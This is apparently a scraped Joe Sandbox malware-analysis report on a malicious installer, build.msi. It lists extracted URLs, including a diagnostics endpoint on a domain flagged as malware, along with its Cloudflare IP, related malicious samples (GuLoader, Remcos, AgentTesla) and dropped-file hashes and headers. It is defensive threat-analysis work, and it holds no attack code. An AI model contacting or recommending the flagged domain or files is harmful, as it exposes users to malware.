                                                                                            https://github.com/sumatrapdfreader/sumatrapdf/commit/646d1feddcc80b3b51072c5b27a1446487904175)launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://docs.oasis-open.org/ns/office/1.2/meta/pkg#Documentlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                high
                                                                                                https://www.sumatrapdfreader.org/download-free-pdf-viewer-------------launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://github.com/mridgers/clink/issues/544)CHANGES.4.drfalse
                                                                                                  high
                                                                                                  https://www.sumatrapdfreader.org/settings/settings3-5-1.htmllauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://github.com/sumatrapdfreader/sumatrapdf/blob/master/AUTHORShttps://github.com/sumatrapdfreadelauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/mridgers/clink/issues/520)CHANGES.4.drfalse
                                                                                                      high
                                                                                                      https://chrome.google.com/webstore?hl=el&category=theme81https://myactivity.google.com/myactivity/?uel.pak.4.drfalse
                                                                                                        high
                                                                                                        https://github.com/chrisant996/clink/issues/82);CHANGES.4.drfalse
                                                                                                          high
                                                                                                          https://github.com/mridgers/clink/issues/487)CHANGES.4.drfalse
                                                                                                            high
                                                                                                            https://github.com/mridgers/clink/issues/342)CHANGES.4.drfalse
                                                                                                              high
                                                                                                              https://www.sumatrapdfreader.org/update-check-rel.txtlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://ocsp.sectigo.com0$rufus-4.6p.exe.4.drfalse
                                                                                                                high
                                                                                                                https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlel.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                                                                                  high
                                                                                                                  https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaIlauncher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://github.com/chrisant996/clink/issues/45);CHANGES.4.drfalse
                                                                                                                    high
                                                                                                                    https://github.com/chrisant996/clink/issues/64);CHANGES.4.drfalse
                                                                                                                      high
                                                                                                                      https://github.com/mridgers/clink/issues/503)CHANGES.4.drfalse
                                                                                                                        high
                                                                                                                        https://sumatra-website.onrender.com/update-check-rel.txtInstaller64LatestInstaller32InstallerArm64Plauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zelevate.exe.4.drfalse
                                                                                                                          high
                                                                                                                          https://github.com/chrisant996/clink/issues/111);CHANGES.4.drfalse
                                                                                                                            high
                                                                                                                            https://github.com/chrisant996/clink/issues/13)CHANGES.4.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/mridgers/clink/issues/257)).CHANGES.4.drfalse
                                                                                                                                high
                                                                                                                                https://support.google.com/chrome/a/answer/9122284el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.sumatrapdfreader.org/docs/Corrupted-installationlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.sumatrapdfreader.org/docs/Submit-crash-report.htmllauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_build.msifalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  unknown
                                                                                                                                  https://github.com/chrisant996/clink/issues/94);CHANGES.4.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/mridgers/clink/issues/422)CHANGES.4.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.sumatrapdfreader.org/URLUpdateInfohttps://www.sumatrapdfreader.org/docs/Version-history.launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://github.com/mridgers/clink/issues/543)CHANGES.4.drfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/mridgers/clink/issues/365)CHANGES.4.drfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/mridgers/clink)CHANGES.4.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.deepl.com/translator#-/$launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.sumatrapdfreader.org/download-free-pdf-viewerlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.idpf.org/2007/opflauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://github.com/chrisant996/clink/issues/32);CHANGES.4.drfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/chrisant996/clink/issues/78);CHANGES.4.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://ocsp.sectigo.com0rufus-4.6p.exe.4.dr, elevate.exe.4.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/chrisant996/clink/issues/97);CHANGES.4.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtdlauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/mridgers/clink/issues/258)).CHANGES.4.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/microsoft/detours)CHANGES.4.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/mridgers/clink/issues/206)).CHANGES.4.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#rufus-4.6p.exe.4.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://docs.oasis-open.org/ns/office/1.2/meta/odf#ContentFilelauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/chrisant996/clink/issues/62);CHANGES.4.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://passwords.google.comComptefr.pak.4.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      104.21.64.101
                                                                                                                                                                      shaundoose.comUnited States
                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                      Analysis ID:1648463
                                                                                                                                                                      Start date and time:2025-03-25 21:00:48 +01:00
                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 6m 41s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                      Number of analysed new started processes analysed:15
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Sample name:build.msi
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal72.winMSI@6/117@1/1
                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .msi
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 184.31.69.3, 4.245.163.56, 20.24.125.47, 150.171.28.10
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                      • Execution Graph export aborted for target launcher.exe, PID 564 because there are no executed function
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      No simulations
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      104.21.64.101r3gIOL7UsA.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                        build.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          shaundoose.comr3gIOL7UsA.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          build.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          CLOUDFLARENETUSPlay Voicemail Transcription. (387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 104.17.201.1
                                                                                                                                                                          https://protect.checkpoint.com/v2/r02/___https://lsems.gravityzone.bitdefender.com/xhfsdfMW5hMR*~*QDcqg1KugH/rhrqqgrWni2pyg1KugH/og75AgMRA37Cu37x!i2GzU2ZBRIJzYIFyRp4R0KWU0rWugMmJiYWAVpWKV1K4i6V8hIZ5SM0ZiLWEW1OmR5/DRLcQX0iG12ODR6m0Z2uCX54XhMGr31/03pyTfZ6rYZi*~*XpqUQYOHR1KUiJS11Z/0T2qVjY4XRZcYgpc9i5uJWYR7g20EjL0/YM46gJCqg7mLRrm6jJc4gn5DVr69X0OQV6WNfKt6Z1h7XJOYhqWIX20v3pR/S20XfZm6f1WH4qtBZKWOY6Wx4rKpZ0Onh80BSLOY4Mh83r/3ZsWx36GrQYOHS2SniIWZV507V1OzioqTfo0xY7S5jJhCSsiRhLiZZI4L35OUYZm*~*hJ/*~*js4tfpuWh5qOiIJ9fMm8gK0CTM04fsiv4555ipVyRpOyTY0xjK0AT1mQYYOfW5uUS842iqiCjr4qXIJ73o0Sg80RRoqYjI0*~*j0uN1qiWWpmz3sJBS6Z701OyRrSBfH5DWpWo3oSC02OW1JKCi5/DRsSt4KS/RImw1KZyRp49hsi*~*f6uZRsioj2uZR2mUg0KsQYOHiEK6RJ0/W8SoQYOHXZuJSoGRTMqP3rS2gr/t01xD4MF70sSmSLOOZ64Xh1/fi7bCW6G9f5OMVsGNgYW8XIqsSMq*~*TJR8RJxBgKq0XE09hr/5jqmJZ6mxR2STVryCZpC3WrcNf0JESsVDZM35QYOLRs0GRZc44pm4jYKUQYOLfM0xZ2W8X8iMf04SQYOLWIG7jpOt2EWBf1mNj1iTZ5NBhoqX4qhB4IV5Y5W7QYOHZZ/zgLb60KGB4sOxWZyqWqKnj1u01pWE3YOEiJms1MhB08uJjLiDZZBC00WSjMmq1ImDX6mPVYS0X0KYZ7yL4sKD3oGL4Jh912KMW2FDY0tBYEVE315DYZ65XZ4uTZiKXYixi6SOS5VDSZC5WsmSfKG5R53BjL6xfEKwSKuG12SX0KGAZ8W7R5WBSLl812iWf1Kq3r0vTLqHX5/LR50UWZ06TYKNRrcVd*~*FG88JcGJ/FGF88986aFHbKbb/JIIK/89KHGK8IHaG/I8KIcbba6c7cKI68GGKI7?h=6&fru;n=6&fru;ithx=6___.YzJlOmdhbmdzdGVyOmM6bzpiMTVjN2QxOWQyYmUwNTY1NzUzNWNiMjU5MjdlZDQxYTo3OjBjYTc6YjUxOGI0N2MzNmJhYjUzNGU2MzNkZWE3MDBkNGExYmIwNzljNzhmMDU2MmNkNzkwZDBhMjM3MDE5NjU0YTZkNTpoOlQ6VAGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                          https://business.peppercontent.io/items/1EeoNExLmk9Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.13.204
                                                                                                                                                                          file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                          file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                          https://ergc.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                          • 172.67.157.109
                                                                                                                                                                          Revised - Hartzellprop.com 2025 Handbook29828.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                          • 104.26.0.100
                                                                                                                                                                          CAPITAT SC 2025-2..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 104.26.12.205
                                                                                                                                                                          Revised - Cwalker 2025 Handbook25807.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                          • 172.67.70.233
                                                                                                                                                                          http://hak5.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.18.86.42
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19SAMHWA.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          SAMHWA.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Patch-HWMonitor.Pro.1.3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          HWMonitorPro_x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          znicegreatveryspecialguestyourareforme.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          rPedidodeCota____o-20250325_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          867194897_fedex-factura.batGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Hesap Hareketleri 24-03-2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Pedido de Cota.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          Ll57CUTdDq.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                          • 104.21.64.101
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exer3gIOL7UsA.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                            build.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                              7T7bCyA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                  C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dllr3gIOL7UsA.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    build.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      7T7bCyA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):23978
                                                                                                                                                                                          Entropy (8bit):5.787317377031681
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:hdjhRnij3e8TiTbB4Nw+sz8BgGzPEftQCmz8TYJjPx1G1GfiF:hdjhRij30TbB4Nw+szcgUZPx1+/
                                                                                                                                                                                          MD5:6EAC3B207E4708F025307AD19635C092
                                                                                                                                                                                          SHA1:4E297294F363B429D4D5C8776EFE28423E56A1ED
                                                                                                                                                                                          SHA-256:C70477582C4C655CF3C66AD123EDF44BEEA87078B280C84F1935341DC8729617
                                                                                                                                                                                          SHA-512:60E670042641F829FD87DB28565F428C45CC01A4B159607160CC2CE2FD3B2CAAF853944A1F7429CA50FDB951024FD0FA1C1A09E0575B0E8B48F26D7EEB634F14
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:...@IXOS.@.....@:.yZ.@.....@.....@.....@.....@.....@......&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}..Klio Verfair Tools..build.msi.@.....@.....@.....@......icon_23.exe..&.{5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}.....@.....@.....@.....@.......@.....@.....@.......@......Klio Verfair Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7D0977D7-319F-41E6-AC22-4C628AFB5366}&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}.@......&.{00541E92-B30A-43FA-9AD1-62A7BF8D6B85}&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}.@......&.{0A71947E-5499-4B27-8695-F2466C030D57}&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}.@......&.{40974B72-6EF2-4796-AFED-87826DA707E4}&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}.@......&.{F4E863DB-C2DD-42C9-A0A8-23116650C890}&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}.@......&.{9E2EDF55-187D-47C4-ABCE-D11BC516C477}&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}.@......&.{36EF000F-B295-468F-95A1-F3B736FB6086}&.{
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:V:V
                                                                                                                                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                          Preview:0
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows icon resource - 9 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):167778
                                                                                                                                                                                          Entropy (8bit):2.423036328943719
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:B5eYCuQJjl4boYvgeutkN6gKlKDcyOCC5+dQH7AJI:BU9d5dbkkgmKxOv5iqcJI
                                                                                                                                                                                          MD5:A310A096108CD50A73694E2EC3DD9165
                                                                                                                                                                                          SHA1:F78594FA3D02CE3A462DD19A0B9A6579E1FADA6C
                                                                                                                                                                                          SHA-256:5A601BF5643905CD160C012C50214308215873302B247DEB95EB4CC4426BDA37
                                                                                                                                                                                          SHA-512:4E436E8302EF194025D6DC43B46B4EE3418010DE9B048CE5D6A5B04516ADD88EEF509243F4C72D3B6730157C9D6A0E2521042B28FA3F4C31630DD07DC5A2E085
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:............ ............... .(.......``.... .........HH.... ..T..r...@@.... .(B......00.... ..%.."K.. .... ......p........ .....r......... .h........PNG........IHDR.............\r.f....pHYs..........o.d....IDATx....\.}...of.n.w.6^/..cc0.L.:!...IhS....*..U+.a.>...!.>.!...J]H.+............x}..]{/..3...35!..9g..|^.h......>.w~..""""""""""""""""".y...H$*@7........4......P.j....,...@......@6.......0..9..c........\..y..0.\.&?...d.. .*X...ll.\...*x...%P6.....S..`..8...Z.)..H..`.........L%....5.e0...N4.Y-..Q.$......7cg...;.G...sX..m..X ,%X..S..o-V.o...B.h....n.x.8...Lb%*(.@<....wb...kg1..h<......'Z..P.Dg......E..]..,8.....:.%...pU....k.2...(...%....>..)..1.|...../.5}....*p... .R.tf..I.Vt....*...+....'......m...!<U..x...~.t.e.$.@..X/.}X..*~...<.u.J...++a...l..*~z9,...:.e........{U.ly.......f..k....nB.?.<l...la.|......>.M..X.~....giP..2...4..^......`S..........j....aAP..".@7....b..EU.~..,,l.....3.Elina.......mmV8E........".....[pT(E.../7~./....x.[.X.E..]...".L.?..%\.X..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows icon resource - 7 icons, 256x256, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):372526
                                                                                                                                                                                          Entropy (8bit):4.467275942115759
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:aAVWno2eoqXRy8QGSi6H0NOJe6ay1lrnyoeFM8UuPLZoELS/8taek6KYrOzzCIhZ:LCANx6xPZX9mBW
                                                                                                                                                                                          MD5:B52B2D1D4C9E56CA24AB0CD0730CC5AD
                                                                                                                                                                                          SHA1:C70A3683DF57DE3096CA58F314C0B649035392CC
                                                                                                                                                                                          SHA-256:73CDA59B9158F5DCA967A6EC24A3608C672DCA63F714BFD7B7B5F81C1303F457
                                                                                                                                                                                          SHA-512:CDCAB1C415B87948AD45C967D6C50EA24935D7E58CFC30717E2943D9CE9F5DDEFCB5E60BCE58F9F387635EA30E1A0399DBA644316CC53F1802BAE73B76CB1BFA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview:............ .( ..v......... .(.... ..@@.... .(B...(..00.... ..%...j.. .... ............... .....>......... .h......(............. ...... ............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1907712
                                                                                                                                                                                          Entropy (8bit):6.301794990819788
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:tL9NgP+4hcdTDeM1EF7Jx2meoI4Tzp7iyeNgzd6Nv7:x9NgPjM1E7JPx+ye5
                                                                                                                                                                                          MD5:C4AABD70DC28C9516809B775A30FDD3F
                                                                                                                                                                                          SHA1:43804FA264BF00ECE1EE23468C309BC1BE7C66DE
                                                                                                                                                                                          SHA-256:882063948D675EE41B5AE68DB3E84879350EC81CF88D15B9BABF2FA08E332863
                                                                                                                                                                                          SHA-512:5A88EC6714C4F78B061AED2F2F9C23E7B69596C1185FCB4B21B4C20C84B262667225CC3F380D6E31A47F54A16DC06E4D6AD82CFCA7F499450287164C187CEC51
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: r3gIOL7UsA.msi, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: build.msi, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 7T7bCyA.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe, Detection: malicious, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:=..Tn..Tn..Tn.J)n..Tn.J/n..Tn..Un..Tn.J:n0.Tn.J9n..TnYQPo..TnB.Wo..Tn.J.n..Tn.J(n..Tn.J,n..TnRich..Tn........................PE..d... .Jg.........." .....d................................................... ............`.....................................................x....@..p.......P?...............#...................................................................................text....c.......d.................. ..`.rdata..a............h..............@..@.data........ ......................@....pdata..P?.......@..................@..@.rsrc...p....@.......J..............@..@.reloc...6.......8..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):564736
                                                                                                                                                                                          Entropy (8bit):6.204814981249317
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:jrx//c1kmegKVcvbYAgZ+ml1PUEynhwNblha:5s1DetKMT7yV
                                                                                                                                                                                          MD5:B6D5860F368B28CAA9DD14A51666A5CD
                                                                                                                                                                                          SHA1:DB96D4B476005A684F4A10480C722B3D89DDE8A5
                                                                                                                                                                                          SHA-256:E2CA3EC168AE9C0B4115CD4FE220145EA9B2DC4B6FC79D765E91F415B34D00DE
                                                                                                                                                                                          SHA-512:D2BB1D4F194091FC9F3A2DD27D56105E72C46DB19AF24B91AF84E223FFCC7FEC44B064BF94B63876EE7C20D40C45730B61AA6B1E327947D6FB1633F482DAA529
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                          • Filename: r3gIOL7UsA.msi, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: build.msi, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: 7T7bCyA.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exe, Detection: malicious, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............aX.aX.aX...X.aX...X.aX.`X[.aX...X..aXA.eY.aX...X.aXZ.bY.aX...X.aX...X.aXRich.aX........................PE..d... .Jg.........."...........................@...........................................`.....................................................x............p..,s..............@.......................................................X............................text............................... ..`.rdata..l...........................@..@.data...`>...0......................@....pdata..,s...p...t..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1096
                                                                                                                                                                                          Entropy (8bit):5.13006727705212
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                          MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                          SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                          SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
